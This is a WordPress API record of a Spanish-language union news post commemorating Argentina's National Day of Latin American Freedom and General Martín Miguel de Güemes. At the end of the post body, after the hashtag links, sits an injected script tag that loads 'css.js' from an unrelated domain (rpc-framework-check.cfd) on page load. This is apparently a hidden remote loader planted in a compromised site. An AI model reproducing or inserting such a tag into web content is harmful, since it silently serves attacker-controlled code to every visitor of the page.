{"id":18579,"date":"2025-06-17T00:00:00","date_gmt":"2025-06-17T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18579"},"modified":"2026-02-02T17:00:14","modified_gmt":"2026-02-02T20:00:14","slug":"dia-nacional-de-la-libertad-latinoamericana-3","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/06\/dia-nacional-de-la-libertad-latinoamericana-3\/","title":{"rendered":"D\u00eda Nacional de la Libertad Latinoamericana"},"content":{"rendered":"\n<p>El 17 de junio es el \u201cD\u00eda Nacional de la Libertad Latinoamericana\u201d, en conmemoraci\u00f3n al fallecimiento del General Mart\u00edn Miguel de G\u00fcemes, figura clave de nuestra <a><\/a>independencia.<\/p>\n\n\n\n<p>Hoy recordamos al militar salte\u00f1o que jug\u00f3 un papel central al frente de las milicias que defendieron el norte de nuestro pa\u00eds en las guerras por la independencia.<\/p>\n\n\n\n<p>Sus acciones, en coordinaci\u00f3n con las del General Jos\u00e9 de San Mart\u00edn, facilitaron el cruce de Los Andes para desarrollar con \u00e9xito la campa\u00f1a libertadora.<\/p>\n\n\n\n<p>Este D\u00eda Nacional de la Libertad Latinoamericana no s\u00f3lo celebra el coraje y la determinaci\u00f3n de G\u00fcemes, sino tambi\u00e9n su contribuci\u00f3n significativa a la causa independentista y a la consolidaci\u00f3n de la soberan\u00eda nacional en Argentina y m\u00e1s all\u00e1.<\/p>\n\n\n\n<p>Sec. de Cultura, Ledys Udaquiola.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/sanidadatsalaplata?__eep__=6&amp;__cft__[0]=AZVpAK9i1XPNAEB-it3QtyOLMFLziS9D-j7jvCSPJ6-UQFgqUJ5wAIdRsKvxU5Nh-p4Sb8xlZsAFGrE2XCxy1b5lePJeMZydc3OEo3O_loTajvZ0Ycm79bcjbf-mQcmflHmYah5xumKf-CRgu8ZZuh63&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#SanidadATSALaPlata<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__[0]=AZVpAK9i1XPNAEB-it3QtyOLMFLziS9D-j7jvCSPJ6-UQFgqUJ5wAIdRsKvxU5Nh-p4Sb8xlZsAFGrE2XCxy1b5lePJeMZydc3OEo3O_loTajvZ0Ycm79bcjbf-mQcmflHmYah5xumKf-CRgu8ZZuh63&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#SiempreJuntoAVos<\/a><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>El 17 de junio es el \u201cD\u00eda Nacional de la Libertad Latinoamericana\u201d, en conmemoraci\u00f3n al&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18580,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18579","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18579"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18579\/revisions"}],"predecessor-version":[{"id":20791,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18579\/revisions\/20791"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18580"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18579"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}